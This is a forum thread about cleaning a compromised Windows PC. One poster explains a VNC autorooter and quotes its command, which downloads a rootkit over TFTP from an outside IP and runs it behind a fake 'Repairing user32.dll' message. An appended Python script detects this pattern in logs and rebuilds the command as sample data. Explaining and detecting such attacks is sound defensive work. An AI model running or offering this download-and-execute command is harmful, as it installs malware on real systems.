Man... if your machine has been compromised... now it could still be there with another name...
If you read some... many experts recommend formatting after being "compromised" because you may never know what else happened to your machine!
Sorry for my English.
Maybe TFTP works in Linux, not Windows? I don't have my box in front of me at the moment.
EDIT: Ooops, nope TFTP works on my XP box. FORMAT or talk to streaker, he's got some pointers on cleaning boxes
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
I'll take a look. I know it can be done and I really loathe formatting lol.
That's weird... when I type in tftp in the command prompt I get "command cannot be found". Are you sure you didn't install anything extra?
Edit: wow, that's bizarre. I don't know if it's because I'm running 64-bit or what, but tftp is not found as a command on my desktop. I don't know why the attacker would disable or uninstall it... Also, when these commands were run, they all failed. There were 12 command prompt windows and they all said "tftp is not a recognized command"
I'll scoff at them with you, streaker!
To ats1080, here is the guide:
http://forums.remote-exploit.org/showthread.php?t=13110
Actually, a funny trick I learned...
If you have to format someone's drive, keep the wallpaper and put it back after the reformat (if this is a picture of their kids or whatever). This almost "tricks" them into believing it was their old machine. I know it sounds lame, but it works and they feel happy. Even if they have to start reinstalling programs, they think it's "their old machine" just cleaned up.
But around here we don't have time to dabble into machines; we transfer their shizzola to a good working freshly reimaged one and pick apart the old one on the backend (if it's hardware); software gets the reimage of doom.
VNC autorooter, old but still going around..
It sends keys to a vulnerable VNC server and installs the backdoor..
%comspec% takes you to system32 folder
/c echo Repairing user32.dll tries to make the program look legit
tftp -i 201.252.11.200 GET cazz.exe & start cazz&
Well, that connects via tftp to the IP and gets the rootkit "cazz.exe" and starts it.
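For anyone who wants to hunt for this in process-creation logs, here is an added example (not part of the thread and not any poster's code) that flags command lines where a TFTP GET is chained to a `start` of the fetched file, the pattern described in the post above. The sample command lines are constructed; the first is assembled from the fragments quoted in the post, and the `&` joining the echo to the tftp call is an assumption.

```python
import re

# tftp [-i] <host> GET <file>, the download step quoted in the thread.
TFTP_GET = re.compile(
    r'\btftp(?:\.exe)?\s+(?:-i\s+)?(?P<host>\S+)\s+get\s+(?P<file>[^\s&|]+)', re.I)
# "& start <name>" chained after the download.
START = re.compile(r'&+\s*start\s+(?:""\s+)?(?P<name>[^\s&|]+)', re.I)
# "/c echo ..." placed before the download as cover text.
DECOY = re.compile(r'/c\s+echo\b', re.I)

def stem(name):
    """File name without directory or .exe suffix, lower-cased."""
    base = re.split(r'[\\/]', name)[-1].lower()
    return base[:-4] if base.endswith('.exe') else base

def analyze(cmdline):
    """Return a finding dict if the line fetches a file over TFTP, else None."""
    get = TFTP_GET.search(cmdline)
    if get is None:
        return None
    fetched = get.group('file')
    # Only 'start' calls that come after the download are relevant.
    started = [m.group('name') for m in START.finditer(cmdline, get.end())]
    return {
        'host': get.group('host'),
        'file': fetched,
        'download_and_execute': any(stem(s) == stem(fetched) for s in started),
        'decoy_echo': bool(DECOY.search(cmdline[:get.start()])),
    }

def scan(cmdlines):
    """Return the command lines that download a file and then start it."""
    hits = []
    for line in cmdlines:
        finding = analyze(line)
        if finding and finding['download_and_execute']:
            hits.append(line)
    return hits

# Constructed sample command lines (not real log data).
SAMPLES = [
    r'C:\WINDOWS\system32\cmd.exe /c echo Repairing user32.dll & '
    r'tftp -i 201.252.11.200 GET cazz.exe & start cazz&',
    r'tftp -i 192.0.2.50 GET switch-config.bin',   # plain download, no execution
    r'ping 192.0.2.1',
]

if __name__ == '__main__':
    for line in scan(SAMPLES):
        print('ALERT:', line, analyze(line))
```

A plain TFTP download still returns a finding with `download_and_execute` set to False, so it can be reviewed separately instead of alerting.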